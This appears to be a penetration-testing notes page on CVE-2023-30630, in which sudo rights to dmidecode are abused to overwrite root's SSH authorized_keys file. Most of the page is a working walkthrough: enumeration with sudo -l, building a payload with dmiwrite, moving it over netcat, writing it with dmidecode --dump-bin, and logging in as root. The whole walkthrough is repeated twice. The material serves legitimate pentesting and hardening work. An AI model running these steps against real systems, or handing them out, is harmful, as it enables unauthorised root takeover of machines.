Dmidecode - CVE-2023-30630

Last updated 10 months ago

Was this helpful?

Dmidecode - CVE-2023-30630

Dmidecode is a tool for dumping a computers DMI (SMBIOS) table contents in a human-readable format. This table contains a description of the systems hardware components, as well as other useful pieces of information such as serial numbers and BIOS revisions.

With root permissions to dmidecode a low privileged user can use the application maliciously to escalate its privileges to root through a file write vulnerability.

Newly created files through dmidecode will have the owner root. If you instead write to an already existing file, the content will be overwritten but the privileges will be honored.
You are not able to create directories with dmidecode. If you plan to privesc through .ssh/authorized_key the directory needs to exist.
- To privesc through /root/.ssh/authorized_keys, PermitRootLogin must be enabled in /etc/ssh/sshd_config
dmidecode will add junk at the beginning of the file, this is not visible with cat but you'll see it with vi/vim. To circumvent this write your ssh-key on row 2 or below.
dmidecode version 3.3 has a bug that SEGFAULTs the program when trying to exploit, however this is again fixed for version 3.4. This exploit will work on all versions between 1.8 and 3.4, except 3.3.

Use the tool to build malicious payload.

## Find privesc vector on victim host
[user@victimHost index]$ sudo -l
User user may run the following commands on victimHost:
    (root) NOPASSWD: /usr/sbin/dmidecode

## Verify dmidecode version
[user@victimHost ~]$ /usr/sbin/dmidecode -V
3.2

## Create payload on local attack machine. Note that first line will be destroyed with random characters, so the correct payload needs to be on line 2 or below.
➜ cat authorized_keys
ssh-rsa nothing
ssh-rsa AAAAB3NzaC...[SNIP]

## Build payload with dmiwrite
➜ ./dmiwrite authorized_keys authorized_keys.dmi 
Wrote payload of length 741 to authorized_keys.dmi
Padding 982301 bytes to authorized_keys.dmi
	Setting checksum: memset(buf+30, 130, 1);

Wrote DMI header of length 32 to authorized_keys.dmi
Padding 65536 bytes to authorized_keys.dmi
Congratulations, authorized_keys.dmi looks like a valid DMI file.

## Upload file to victim
➜ nc -w3 victimHost 4488 < authorized_keys.dmi
[user@victimHost tmp]$ nc -lvp 4488 > authorized_keys.dmi

## Write file
[user@victimHost tmp]$ sudo /usr/sbin/dmidecode -d authorized_keys.dmi --no-sysfs --dump-bin /root/.ssh/authorized_keys
# dmidecode 3.2
Scanning authorized_keys.dmi for entry point.
SMBIOS 2.1 present.
1 structures occupying 741 bytes.
Table at 0x00000000.

# Writing 741 bytes to /root/.ssh/authorized_keys.
# Writing 0 bytes to /root/.ssh/authorized_keys.
/root/.ssh/authorized_keys: fwrite: No such file or directory

## Login as root
dmiwrite-master ➜ ssh root@victimHost -i victim-id_rsa
[root@victimHost ~]# id
uid=0(root) gid=0(root) groups=0(root)

Last updated 10 months ago

Was this helpful?

With root permissions to dmidecode a low privileged user can use the application maliciously to escalate its privileges to root through a file write vulnerability.

Newly created files through dmidecode will have the owner root. If you instead write to an already existing file, the content will be overwritten but the privileges will be honored.
You are not able to create directories with dmidecode. If you plan to privesc through .ssh/authorized_key the directory needs to exist.
- To privesc through /root/.ssh/authorized_keys, PermitRootLogin must be enabled in /etc/ssh/sshd_config
dmidecode will add junk at the beginning of the file, this is not visible with cat but you'll see it with vi/vim. To circumvent this write your ssh-key on row 2 or below.
dmidecode version 3.3 has a bug that SEGFAULTs the program when trying to exploit, however this is again fixed for version 3.4. This exploit will work on all versions between 1.8 and 3.4, except 3.3.

Use the tool to build malicious payload.

## Find privesc vector on victim host
[user@victimHost index]$ sudo -l
User user may run the following commands on victimHost:
    (root) NOPASSWD: /usr/sbin/dmidecode

## Verify dmidecode version
[user@victimHost ~]$ /usr/sbin/dmidecode -V
3.2

## Create payload on local attack machine. Note that first line will be destroyed with random characters, so the correct payload needs to be on line 2 or below.
➜ cat authorized_keys
ssh-rsa nothing
ssh-rsa AAAAB3NzaC...[SNIP]

## Build payload with dmiwrite
➜ ./dmiwrite authorized_keys authorized_keys.dmi 
Wrote payload of length 741 to authorized_keys.dmi
Padding 982301 bytes to authorized_keys.dmi
	Setting checksum: memset(buf+30, 130, 1);

Wrote DMI header of length 32 to authorized_keys.dmi
Padding 65536 bytes to authorized_keys.dmi
Congratulations, authorized_keys.dmi looks like a valid DMI file.

## Upload file to victim
➜ nc -w3 victimHost 4488 < authorized_keys.dmi
[user@victimHost tmp]$ nc -lvp 4488 > authorized_keys.dmi

## Write file
[user@victimHost tmp]$ sudo /usr/sbin/dmidecode -d authorized_keys.dmi --no-sysfs --dump-bin /root/.ssh/authorized_keys
# dmidecode 3.2
Scanning authorized_keys.dmi for entry point.
SMBIOS 2.1 present.
1 structures occupying 741 bytes.
Table at 0x00000000.

# Writing 741 bytes to /root/.ssh/authorized_keys.
# Writing 0 bytes to /root/.ssh/authorized_keys.
/root/.ssh/authorized_keys: fwrite: No such file or directory

## Login as root
dmiwrite-master ➜ ssh root@victimHost -i victim-id_rsa
[root@victimHost ~]# id
uid=0(root) gid=0(root) groups=0(root)